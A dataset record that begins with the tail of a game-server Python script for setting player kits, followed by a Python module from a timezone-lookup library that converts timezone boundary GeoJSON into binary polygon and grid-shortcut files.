'_rifle'\r\n self.setKit(kit, player.getTeam(), soldier.templateName)\r\n \r\n if player in self.spawned: return\r\n self.spawned.append(player)\r\n self.spawned_dict[player] = soldier.templateName\r\n \r\n def setKit(self, kit, team, soldier):\r\n rconExec('gameLogic.setKit %d 6 \"%s\" \"%s\"' % (team, kit, soldier))\r\n if DEBUG: print 'NCOrifle: Set NCO kit for team %d to %s, %s' % (team, kit, soldier)\r\n \r\n def addPlayer(self, player):\r\n if player not in self.watched_players:\r\n self.watched_players.append(player)\r\n if DEBUG: print 'NCOrifle: added player %s to watched players list' % player.getName()\r\n \r\n def removePlayer(self, player):\r\n if player in self.watched_players:\r\n self.watched_players.remove(player)\r\n if DEBUG: print 'NCOrifle: removed player %s from watched players list' % player.getName()\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding:utf-8 -*-
import json
from datetime import datetime
from math import ceil, floor
from os.path import abspath, join, pardir
from struct import pack
from .global_settings import (
DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,
NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,
)
# # # keep in mind: the faster numba optimized helper fct. cannot be used here,
# # # because numpy classes are not being used at this stage yet!
from .helpers import coord2int, inside_polygon, int2coord
# from helpers import coord2int, inside_polygon, int2coord
# from global_settings import (
# DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,
# NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,
# )
# import sys
# from os.path import dirname
#
# sys.path.insert(0, dirname(__file__))
# from helpers import coord2int, int2coord, inside_polygon
"""
TODO write tests
USE INSTRUCTIONS:
- download the latest timezones.geojson.zip file from github.com/evansiroky/timezone-boundary-builder/releases
- unzip and place the combined.json inside this timezonefinder folder
- run this file_converter.py as a script until the compilation of the binary files is completed.
IMPORTANT: all coordinates (floats) are being converted to int32 (multiplied by 10^7). This makes computations faster
and it takes lot less space, without loosing too much accuracy (min accuracy (=at the equator) is still 1cm !)
B = unsigned char (1byte = 8bit Integer)
H = unsigned short (2 byte integer)
I = unsigned 4byte integer
i = signed 4byte integer
Binaries being written:
[POLYGONS:] there are approx. 1k Polygons (evansiroky/timezone-boundary-builder 2017a)
poly_zone_ids: the related zone_id for every polygon ('<H')
poly_coord_amount: the amount of coordinates in every polygon ('<I')
poly_adr2data: address in poly_data.bin where data for every polygon starts ('<I')
poly_max_values: boundaries for every polygon ('<iiii': xmax, xmin, ymax, ymin)
poly_data: coordinates for every polygon (multiple times '<i') (for every polygon first all x then all y values!)
poly_nr2zone_id: the polygon number of the first polygon from every zone('<H')
[HOLES:] number of holes (162 evansiroky/timezone-boundary-builder 2018d)
hole_poly_ids: the related polygon_nr (=id) for every hole ('<H')
hole_coord_amount: the amount of coordinates in every hole ('<H')
hole_adr2data: address in hole_data.bin where data for every hole starts ('<I')
hole_data: coordinates for every hole (multiple times '<i')
[SHORTCUTS:] the surface of the world is split up into a grid of shortcut rectangles.
-> there are a total of 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT shortcuts
shortcut here means storing for every cell in a grid of the world map which polygons are located in that cell
they can therefore be used to drastically reduce the amount of polygons which need to be checked in order to
decide which timezone a point is located in.
the list of polygon ids in each shortcut is sorted after freq. of appearance of their zone id
this is critical for ruling out zones faster (as soon as just polygons of one zone are left this zone can be returned)
shortcuts_entry_amount: the amount of polygons for every shortcut ('<H')
shortcuts_adr2data: address in shortcut_data.bin where data for every shortcut starts ('<I')
shortcuts_data: polygon numbers (ids) for every shortcut (multiple times '<H')
shortcuts_unique_id: the zone id if only polygons from one zone are present,
a high number (with no corresponding zone) if not ('<H').
the majority of zones either have no polygons at all (sea) or just one zone.
this zone then can be instantly returned without actually testing polygons.
also stored extra binary if only one zone (to directly return that zone without checking)
statistics: (data version 2018g)
maximal amount of coordinates in one polygon: 139130
amount_of_holes: 219
amount of polygons: 1177
shortcut statistics:
highest entry amount is 46
frequencies of entry amounts (from 0 to max entries):
[76359, 45216, 7204, 710, 81, 17, 4, 1, 3, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
relative accumulated frequencies [%]:
[58.92, 93.81, 99.37, 99.91, 99.98, 99.99, 99.99, 99.99, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,
100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,
100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]
[41.08, 6.19, 0.63, 0.09, 0.02, 0.01, 0.01, 0.01, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0]
58.92 % of all shortcuts are empty
highest amount of different zones in one shortcut is 7
frequencies of entry amounts (from 0 to max):
[76359, 45555, 6963, 672, 43, 6, 1, 1]
relative accumulated frequencies [%]:
[58.92, 94.07, 99.44, 99.96, 99.99, 100.0, 100.0, 100.0]
[41.08, 5.93, 0.56, 0.04, 0.01, 0.0, 0.0, 0.0]
--------------------------------
The number of filled shortcut zones are: 53241 (= 41.08 % of all shortcuts)
The number of polygons is: 1177
The number of floats in all the polygons is (2 per point): 10887056
writing file " poly_nr2zone_id.bin "
Done
writing file " poly_zone_ids.bin "
writing file " poly_max_values.bin "
writing file " poly_data.bin "
writing file " poly_adr2data.bin "
writing file " poly_coord_amount.bin "
writing file " shortcuts_entry_amount.bin "
writing file " shortcuts_adr2data.bin "
writing file " shortcuts_data.bin "
writing file " shortcuts_unique_id.bin "
writing file " hole_poly_ids.bin "
writing file " hole_coord_amount.bin "
writing file " hole_adr2data.bin "
writing file " hole_data.bin "
the polygon data makes up 97.11 % of the data
the shortcuts make up 2.01 % of the data
holes make up 0.88 % of the data
"""
nr_of_lines = -1
all_tz_names = []
poly_zone_ids = []
all_boundaries = []
all_coords = []
all_lengths = []
amount_of_holes = 0
polynrs_of_holes = []
all_holes = []
all_hole_lengths = []
list_of_pointers = []
poly_nr2zone_id = []
shortcuts = {}
def x_shortcut(lng):
# higher (=lng) means higher x shortcut!!! 0 (-180deg lng) -> 360 (180deg)
# if lng < -180 or lng >= 180:
# raise ValueError('longitude out of bounds', lng)
return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)
def y_shortcut(lat):
# lower y (=lat) means higher y shortcut!!! 0 (90deg lat) -> 180 (-90deg)
# if lat < -90 or lat >= 90:
# raise ValueError('this latitude is out of bounds', lat)
return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)
def big_zone(xmax, xmin, ymax, ymin):
# returns True if a zone with those boundaries could have more than 4 shortcuts
return xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 / NR_SHORTCUTS_PER_LAT
def percent(numerator, denominator):
return round((numerator / denominator) * 100, 2)
def accumulated_frequency(int_list):
out = []
total = sum(int_list)
acc = 0
for e in int_list:
acc += e
out.append(percent(acc, total))
return out
def ints_of(line=0):
x_coords, y_coords = all_coords[line]
return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]
def contained(x, y, x_coords, y_coords):
return inside_polygon(x, y, [x_coords, y_coords])
def unique(iterable):
out = []
for i in iterable:
if i not in out:
out.append(i)
return out
def point_between(p1, p2):
return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2
def get_shortcuts(x, y):
result = shortcuts.get((x, y))
if result is None:
return []
else:
return result
def _polygons(id_list):
for i in id_list:
yield all_coords[i]
def not_empty(iterable):
for i in iterable:
return True
return False
def polys_of_one_zone():
for i in range(len(timezone_names)):
start = poly_nr2zone_id[i]
end = poly_nr2zone_id[i + 1]
yield list(range(start, end))
def replace_entry(iterable, entry, substitute):
for i in range(len(iterable)):
if iterable[i] == entry:
iterable[i] = substitute
return iterable
def _holes_in_poly(poly_nr):
i = 0
for nr in polynrs_of_holes:
if nr == poly_nr:
yield all_holes[i]
i += 1
def parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):
global amount_of_holes
global nr_of_lines
global poly_zone_ids
print('Parsing data from {}\nthis could take a while...\n'.format(path))
tz_list = json.loads(open(path).read()).get('features')
# this counter just counts polygons, not holes!
polygon_counter = 0
current_zone_id = 0
print('holes found at: (poly_nr zone_name)')
for tz_dict in tz_list:
if DEBUG and polygon_counter > DEBUG_POLY_STOP:
break
tz_name = tz_dict.get('properties').get("tzid")
# print(tz_name)
all_tz_names.append(tz_name)
geometry = tz_dict.get("geometry")
if geometry.get('type') == 'MultiPolygon':
# depth is 4
multipolygon = geometry.get("coordinates")
else:
# depth is 3 (only one polygon, possibly with holes!)
multipolygon = [geometry.get("coordinates")]
# multipolygon has depth 4
# assert depth_of_array(multipolygon) == 4
for poly_with_hole in multipolygon:
# assert len(poly_with_hole) > 0
# the first entry is polygon
x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))
# IMPORTANT: do not use the last value (is equal to the first)!
x_coords = list(x_coords)
y_coords = list(y_coords)
x_coords.pop(-1)
y_coords.pop(-1)
all_coords.append((x_coords, y_coords))
# assert len(x_coords) > 0
all_lengths.append(len(x_coords))
all_boundaries.append((max(x_coords), min(x_coords), max(y_coords), min(y_coords)))
poly_zone_ids.append(current_zone_id)
# everything else is interpreted as a hole!
for hole in poly_with_hole:
print(polygon_counter, tz_name)
# keep track of how many holes there are
amount_of_holes += 1
polynrs_of_holes.append(polygon_counter)
x_coords, y_coords = list(zip(*hole))
# IMPORTANT: do not use the last value (is equal to the first)!
x_coords = list(x_coords)
y_coords = list(y_coords)
x_coords.pop(-1)
y_coords.pop(-1)
all_holes.append((x_coords, y_coords))
all_hole_lengths.append(len(x_coords))
polygon_counter += 1
current_zone_id += 1
if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):
# 34621 in tz_world 2016d (small enough for int16)
# 137592 in evansiroky/timezone-boundary-builder 2017a (now int32 is needed!)
raise ValueError('amount of coords cannot be represented by int32 in poly_coord_amount.bin:',
max(all_lengths))
if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):
# 21071 in evansiroky/timezone-boundary-builder 2017a (int16 still enough)
raise ValueError('amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:',
max(all_hole_lengths))
nr_of_lines = len(all_lengths)
if polygon_counter != nr_of_lines:
raise ValueError('polygon counter and entry number in all_length is different:', polygon_counter, nr_of_lines)
if nr_of_lines >= 2 ** (8 * NR_BYTES_H):
# 24k in tz_world 2016d
# 1022 in evansiroky/timezone-boundary-builder 2017a
raise ValueError('polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are',
nr_of_lines, 'polygons')
if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):
# 420 different zones in evansiroky/timezone-boundary-builder 2017a
# used in shortcuts_unique_id and poly_zone_ids
raise ValueError('zone id cannot be encoded as char (int8). the last id is',
poly_zone_ids[-1])
if 0 in all_lengths:
raise ValueError()
print('... parsing done.')
print('maximal amount of coordinates in one polygon:', max(all_lengths))
print('amount_of_holes:', amount_of_holes)
print('amount of polygons:', nr_of_lines)
print('\n')
def update_zone_names(path=TIMEZONE_NAMES_FILE):
global poly_zone_ids
global list_of_pointers
global all_boundaries
global all_coords
global all_lengths
global polynrs_of_holes
print('updating the zone names in {} now...'.format(path))
# pickle the zone names (python array)
with open(abspath(path), 'w') as f:
f.write(json.dumps(all_tz_names))
print('...Done.\n\nComputing where zones start and end...')
i = 0
last_id = -1
for zone_id in poly_zone_ids:
if zone_id != last_id:
poly_nr2zone_id.append(i)
if zone_id < last_id:
raise ValueError()
last_id = zone_id
i += 1
poly_nr2zone_id.append(i)
print('...Done.\n')
def compile_binaries():
global nr_of_lines
global shortcuts
def print_shortcut_statistics():
frequencies = []
max_val = max(*nr_of_entries_in_shortcut)
print('shortcut statistics:')
print('highest entry amount is', max_val)
while max_val >= 0:
frequencies.append(nr_of_entries_in_shortcut.count(max_val))
max_val -= 1
frequencies.reverse()
print('frequencies of entry amounts (from 0 to max entries):')
print(frequencies)
empty_shortcuts = frequencies[0]
print('relative accumulated frequencies [%]:')
acc = accumulated_frequency(frequencies)
print(acc)
print([round(100 - x, 2) for x in acc])
print(percent(empty_shortcuts, amount_of_shortcuts), '% of all shortcuts are empty\n')
amount_of_different_zones = []
for entry in shortcut_entries:
registered_zone_ids = []
for polygon_nr in entry:
id = poly_zone_ids[polygon_nr]
if id not in registered_zone_ids:
registered_zone_ids.append(id)
amount_of_different_zones.append(len(registered_zone_ids))
frequencies = []
max_val = max(*amount_of_different_zones)
print('highest amount of different zones in one shortcut is', max_val)
while max_val >= 1:
frequencies.append(amount_of_different_zones.count(max_val))
max_val -= 1
# show the proper amount of shortcuts with 0 zones (=nr of empty shortcuts)
frequencies.append(empty_shortcuts)
frequencies.reverse()
print('frequencies of entry amounts (from 0 to max):')
print(frequencies)
print('relative accumulated frequencies [%]:')
acc = accumulated_frequency(frequencies)
print(acc)
print([round(100 - x, 2) for x in acc])
print('--------------------------------\n')
def included_shortcut_row_nrs(max_lat, min_lat):
return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))
def included_shortcut_column_nrs(max_lng, min_lng):
return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))
def longitudes_to_check(max_lng, min_lng):
output_list = []
step = 1 / NR_SHORTCUTS_PER_LNG
current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG
end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG
while current < end:
output_list.append(current)
current += step
output_list.append(end)
return output_list
def latitudes_to_check(max_lat, min_lat):
output_list = []
step = 1 / NR_SHORTCUTS_PER_LAT
current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT
end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT
while current < end:
output_list.append(current)
current += step
output_list.append(end)
return output_list
def compute_x_intersection(y, x1, x2, y1, y2):
"""returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2
"""
delta_y = y2 - y1
if delta_y == 0:
return x1
return ((y - y1) * (x2 - x1) / delta_y) + x1
def compute_y_intersection(x, x1, x2, y1, y2):
"""returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2
"""
delta_x = x2 - x1
if delta_x == 0:
return x1
return ((x - x1) * (y2 - y1) / delta_x) + y1
def x_intersections(y, x_coords, y_coords):
intersects = []
for i in range(len(y_coords) - 1):
iplus1 = i + 1
if y_coords[i] <= y:
# print('Y1<=y')
if y_coords[iplus1] > y:
# this was a crossing. compute the intersect
# print('Y2>y')
intersects.append(
compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))
else:
# print('Y1>y')
if y_coords[iplus1] <= y:
# this was a crossing. compute the intersect
# print('Y2<=y')
intersects.append(compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i],
y_coords[iplus1]))
return intersects
def y_intersections(x, x_coords, y_coords):
intersects = []
for i in range(len(y_coords) - 1):
iplus1 = i + 1
if x_coords[i] <= x:
if x_coords[iplus1] > x:
# this was a crossing. compute the intersect
intersects.append(
compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))
else:
if x_coords[iplus1] <= x:
# this was a crossing. compute the intersect
intersects.append(compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i],
y_coords[iplus1]))
return intersects
def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):
shortcuts_for_line = set()
# x_longs = binary_reader.x_coords_of(line)
x_longs, y_longs = ints_of(line)
# y_longs = binary_reader.y_coords_of(line)
y_longs.append(y_longs[0])
x_longs.append(x_longs[0])
step = 1 / NR_SHORTCUTS_PER_LAT
# print('checking the latitudes')
for lat in latitudes_to_check(ymax, ymin):
# print(lat)
# print(coordinate_to_longlong(lat))
# print(y_longs)
# print(x_intersections(coordinate_to_longlong(lat), x_longs, y_longs))
# raise ValueError
intersects = sorted([int2coord(x) for x in
x_intersections(coord2int(lat), x_longs, y_longs)])
# print(intersects)
nr_of_intersects = len(intersects)
if nr_of_intersects % 2 != 0:
raise ValueError('an uneven number of intersections has been accounted')
for i in range(0, nr_of_intersects, 2):
possible_longitudes = []
# collect all the zones between two intersections [in,out,in,out,...]
iplus = i + 1
intersection_in = intersects[i]
intersection_out = intersects[iplus]
if intersection_in == intersection_out:
# the polygon has a point exactly on the border of a shortcut zone here!
# only select the top shortcut if it is actually inside the polygon (point a little up is inside)
if contained(coord2int(intersection_in), coord2int(lat) + 1, x_longs,
y_longs):
shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat) - 1))
# the bottom shortcut is always selected
shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat)))
else:
# add all the shortcuts for the whole found area of intersection
possible_y_shortcut = y_shortcut(lat)
# both shortcuts should only be selected when the polygon doesnt stays on the border
middle = intersection_in + (intersection_out - intersection_in) / 2
if contained(coord2int(middle), coord2int(lat) + 1, x_longs,
y_longs):
while intersection_in < intersection_out:
possible_longitudes.append(intersection_in)
intersection_in += step
possible_longitudes.append(intersection_out)
# the shortcut above and below of the intersection should be selected!
possible_y_shortcut_min1 = possible_y_shortcut - 1
for possible_x_coord in possible_longitudes:
shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))
shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut_min1))
else:
# polygon does not cross the border!
while intersection_in < intersection_out:
possible_longitudes.append(intersection_in)
intersection_in += step
possible_longitudes.append(intersection_out)
# only the shortcut above of the intersection should be selected!
for possible_x_coord in possible_longitudes:
shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))
# print('now all the longitudes to check')
# same procedure horizontally
step = 1 / NR_SHORTCUTS_PER_LAT
for lng in longitudes_to_check(xmax, xmin):
# print(lng)
# print(coordinate_to_longlong(lng))
# print(x_longs)
# print(x_intersections(coordinate_to_longlong(lng), x_longs, y_longs))
intersects = sorted([int2coord(y) for y in
y_intersections(coord2int(lng), x_longs, y_longs)])
# print(intersects)
nr_of_intersects = len(intersects)
if nr_of_intersects % 2 != 0:
raise ValueError('an uneven number of intersections has been accounted')
possible_latitudes = []
for i in range(0, nr_of_intersects, 2):
# collect all the zones between two intersections [in,out,in,out,...]
iplus = i + 1
intersection_in = intersects[i]
intersection_out = intersects[iplus]
if intersection_in == intersection_out:
# the polygon has a point exactly on the border of a shortcut here!
# only select the left shortcut if it is actually inside the polygon (point a little left is inside)
if contained(coord2int(lng) - 1, coord2int(intersection_in), x_longs,
y_longs):
shortcuts_for_line.add((x_shortcut(lng) - 1, y_shortcut(intersection_in)))
# the right shortcut is always selected
shortcuts_for_line.add((x_shortcut(lng), y_shortcut(intersection_in)))
else:
# add all the shortcuts for the whole found area of intersection
possible_x_shortcut = x_shortcut(lng)
# both shortcuts should only be selected when the polygon doesnt stays on the border
middle = intersection_in + (intersection_out - intersection_in) / 2
if contained(coord2int(lng) - 1, coord2int(middle), x_longs,
y_longs):
while intersection_in < intersection_out:
possible_latitudes.append(intersection_in)
intersection_in += step
possible_latitudes.append(intersection_out)
# both shortcuts right and left of the intersection should be selected!
possible_x_shortcut_min1 = possible_x_shortcut - 1
for possible_latitude in possible_latitudes:
shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))
shortcuts_for_line.add((possible_x_shortcut_min1, y_shortcut(possible_latitude)))
else:
while intersection_in < intersection_out:
possible_latitudes.append(intersection_in)
intersection_in += step
# only the shortcut right of the intersection should be selected!
possible_latitudes.append(intersection_out)
for possible_latitude in possible_latitudes:
shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))
return shortcuts_for_line
def construct_shortcuts():
print('building shortucts...')
print('currently at polygon nr:')
line = 0
for xmax, xmin, ymax, ymin in all_boundaries:
# xmax, xmin, ymax, ymin = boundaries_of(line=line)
if line % 100 == 0:
print(line)
# print([xmax, xmin, ymax, ymin])
column_nrs = included_shortcut_column_nrs(xmax, xmin)
row_nrs = included_shortcut_row_nrs(ymax, ymin)
if big_zone(xmax, xmin, ymax, ymin):
# print('line ' + str(line))
# print('This is a big zone! computing exact shortcuts')
# print('Nr of entries before')
# print(len(column_nrs) * len(row_nrs))
# print('columns and rows before optimisation:')
# print(column_nrs)
# print(row_nrs)
# print(ints_of(line))
# This is a big zone! compute exact shortcuts with the whole polygon points
shortcuts_for_line = compute_exact_shortcuts(xmax, xmin, ymax, ymin, line)
# n += len(shortcuts_for_line)
min_x_shortcut = column_nrs[0]
max_x_shortcut = column_nrs[-1]
min_y_shortcut = row_nrs[0]
max_y_shortcut = row_nrs[-1]
shortcuts_to_remove = []
# remove shortcuts from outside the possible/valid area
for x, y in shortcuts_for_line:
if x < min_x_shortcut or x > max_x_shortcut or y < min_y_shortcut or y > max_y_shortcut:
shortcuts_to_remove.append((x, y))
for s in shortcuts_to_remove:
shortcuts_for_line.remove(s)
# print('and after:')
# print(len(shortcuts_for_line))
# print(shortcuts_for_line)
# column_nrs_after = set()
# row_nrs_after = set()
# for x, y in shortcuts_for_line:
# column_nrs_after.add(x)
# row_nrs_after.add(y)
# print(column_nrs_after)
# print(row_nrs_after)
# print(shortcuts_for_line)
if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):
raise ValueError(
'there are more shortcuts than before now. there is something wrong with the algorithm!')
if len(shortcuts_for_line) < 3:
raise ValueError('algorithm not valid! less than 3 zones detected (should be at least 3)')
else:
shortcuts_for_line = []
for column_nr in column_nrs:
for row_nr in row_nrs:
shortcuts_for_line.append((column_nr, row_nr))
# print(shortcuts_for_line)
for shortcut in shortcuts_for_line:
shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]
line += 1
# print('collected entries:')
# print(n)
start_time = datetime.now()
construct_shortcuts()
end_time = datetime.now()
print('calculating the shortcuts took:', end_time - start_time, '\n')
# there are two floats per coordinate (lng, lat)
nr_of_floats = 2 * sum(all_lengths)
# write number of entries in shortcut field (x,y)
nr_of_entries_in_shortcut = []
shortcut_entries = []
amount_filled_shortcuts = 0
def sort_poly_shortcut(poly_nrs):
# TODO write test
# the list of polygon ids in each shortcut is sorted after freq. of appearance of their zone id
# this is critical for ruling out zones faster
# (as soon as just polygons of one zone are left this zone can be returned)
# only around 5% of all shortcuts include polygons from more than one zone
# in most of those cases there are only two types of zones (= entries in counted_zones) and one of them
# has only one entry (important to check the zone with one entry first!).
polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]
id_freq = [polygon_ids.count(id) for id in polygon_ids]
zipped = list(zip(poly_nrs, polygon_ids, id_freq))
# also make sure polygons with the same zone freq. are ordered after their zone id
# (polygons from different zones should not get mixed up)
sort = sorted((sorted(zipped, key=lambda x: x[1])), key=lambda x: x[2])
return [x[0] for x in sort] # take only the polygon nrs
# count how many shortcut addresses will be written:
# flatten out the shortcuts in one list in the order they are going to be written inside the polygon file
for x in range(360 * NR_SHORTCUTS_PER_LNG):
for y in range(180 * NR_SHORTCUTS_PER_LAT):
try:
shortcuts_this_entry = shortcuts[(x, y)]
shortcut_entries.append(sort_poly_shortcut(shortcuts_this_entry))
amount_filled_shortcuts += 1
nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))
# print((x,y,this_lines_shortcuts))
except KeyError:
nr_of_entries_in_shortcut.append(0)
amount_of_shortcuts = len(nr_of_entries_in_shortcut)
print_shortcut_statistics()
if amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG * NR_SHORTCUTS_PER_LAT:
print(amount_of_shortcuts)
raise ValueError('this number of shortcut zones is wrong')
print('The number of filled shortcut zones are:', amount_filled_shortcuts, '(=',
round((amount_filled_shortcuts / amount_of_shortcuts) * 100, 2), '% of all shortcuts)')
# for every shortcut <H and <I is written (nr of entries and address)
shortcut_space = 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I)
for nr in nr_of_entries_in_shortcut:
# every line in every shortcut takes up 2bytes
shortcut_space += NR_BYTES_H * nr
print('The number of polygons is:', nr_of_lines)
print('The number of floats in all the polygons is (2 per point):', nr_of_floats)
path = 'poly_nr2zone_id.bin'
print('writing file', path)
output_file = open(path, 'wb')
for zone_id in poly_nr2zone_id:
output_file.write(pack(b'<H', zone_id))
output_file.close()
print('Done\n')
# write zone_ids
path = 'poly_zone_ids.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for zone_id in poly_zone_ids:
output_file.write(pack(b'<H', zone_id))
output_file.close()
# write boundary_data
path = 'poly_max_values.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for xmax, xmin, ymax, ymin in all_boundaries:
output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin), coord2int(ymax), coord2int(ymin)))
output_file.close()
# write polygon_data, addresses and number of values
path = 'poly_data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
addresses = []
i = 0
for x_coords, y_coords in all_coords:
addresses.append(output_file.tell())
if all_lengths[i] != len(x_coords):
raise ValueError('x_coords do not have the expected length!', all_lengths[i], len(x_coords))
for x in x_coords:
output_file.write(pack(b'<i', coord2int(x)))
for y in y_coords:
output_file.write(pack(b'<i', coord2int(y)))
i += 1
output_file.close()
path = 'poly_adr2data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for adr in addresses:
output_file.write(pack(b'<I', adr))
output_file.close()
path = 'poly_coord_amount.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for length in all_lengths:
output_file.write(pack(b'<I', length))
output_file.close()
# [SHORTCUT AREA]
# write all nr of entries
path = 'shortcuts_entry_amount.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for nr in nr_of_entries_in_shortcut:
if nr > 300:
raise ValueError("There are too many polygons in this shortcut:", nr)
output_file.write(pack(b'<H', nr))
output_file.close()
# write Address of first Polygon_nr in shortcut field (x,y)
# Attention: 0 is written when no entries are in this shortcut
adr = 0
path = 'shortcuts_adr2data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for nr in nr_of_entries_in_shortcut:
if nr == 0:
output_file.write(pack(b'<I', 0))
else:
output_file.write(pack(b'<I', adr))
# each line_nr takes up 2 bytes of space
adr += 2 * nr
output_file.close()
# write Line_Nrs for every shortcut
path = 'shortcuts_data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for entries in shortcut_entries:
for entry in entries:
if entry > nr_of_lines:
raise ValueError(entry)
output_file.write(pack(b'<H', entry))
output_file.close()
# write corresponding zone id for every shortcut (iff unique)
path = 'shortcuts_unique_id.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
if poly_zone_ids[-1] >= INVALID_ZONE_ID:
raise ValueError(
'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!')
for x in range(360 * NR_SHORTCUTS_PER_LNG):
for y in range(180 * NR_SHORTCUTS_PER_LAT):
try:
shortcuts_this_entry = shortcuts[(x, y)]
unique_id = poly_zone_ids[shortcuts_this_entry[0]]
for nr in shortcuts_this_entry:
if poly_zone_ids[nr] != unique_id:
# there is a polygon from a different zone (hence an invalid id should be written)
unique_id = INVALID_ZONE_ID
break
output_file.write(pack(b'<H', unique_id))
except KeyError:
# also write an Invalid Id when there is no polygon at all
output_file.write(pack(b'<H', INVALID_ZONE_ID))
output_file.close()
# [HOLE AREA, Y = number of holes (very few: around 22)]
hole_space = 0
# '<H' for every hole store the related line
path = 'hole_poly_ids.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
i = 0
for line in polynrs_of_holes:
if line > nr_of_lines:
raise ValueError(line, nr_of_lines)
output_file.write(pack(b'<H', line))
i += 1
hole_space += output_file.tell()
output_file.close()
if i > amount_of_holes:
raise ValueError('There are more related lines than holes.')
# '<H' Y times [H unsigned short: nr of values (coordinate PAIRS! x,y in int32 int32) in this hole]
path = 'hole_coord_amount.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for length in all_hole_lengths:
output_file.write(pack(b'<H', length))
hole_space += output_file.tell()
output_file.close()
# '<I' Y times [ I unsigned int: absolute address of the byte where the data of that hole starts]
adr = 0
path = 'hole_adr2data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for length in all_hole_lengths:
output_file.write(pack(b'<I', adr))
# each pair of points takes up 8 bytes of space
adr += 2 * NR_BYTES_I * length
hole_space += output_file.tell()
output_file.close()
# Y times [ 2x i signed ints for every hole: x coords, y coords ]
# write hole polygon_data
path = 'hole_data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for x_coords, y_coords in all_holes:
for x in x_coords:
output_file.write(pack(b'<i', coord2int(x)))
for y in y_coords:
output_file.write(pack(b'<i', coord2int(y)))
hole_space += output_file.tell()
output_file.close()
polygon_space = nr_of_floats * NR_BYTES_I
total_space = polygon_space + hole_space + shortcut_space
print('the polygon data makes up', percent(polygon_space, total_space), '% of the data')
